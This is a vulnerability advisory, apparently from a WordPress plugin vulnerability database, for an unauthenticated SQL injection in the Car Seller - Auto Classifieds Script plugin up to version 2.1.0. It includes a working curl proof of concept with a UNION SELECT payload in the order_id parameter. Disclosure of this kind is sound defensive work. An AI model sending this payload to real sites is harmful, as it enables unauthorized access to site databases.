WordPress Plugin Vulnerabilities
Car Seller - Auto Classifieds Script <= 2.1.0 - Unauthenticated SQL Injection
Description
The request_list_request AJAX call of the plugin, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
Proof of Concept
curl 'https://example.com/wp-admin/admin-ajax.php' \ --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \ --compressed \ --insecure
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-26 (about 3 years ago)
Added
2021-04-26 (about 3 years ago)
Last Updated
2021-04-29 (about 3 years ago)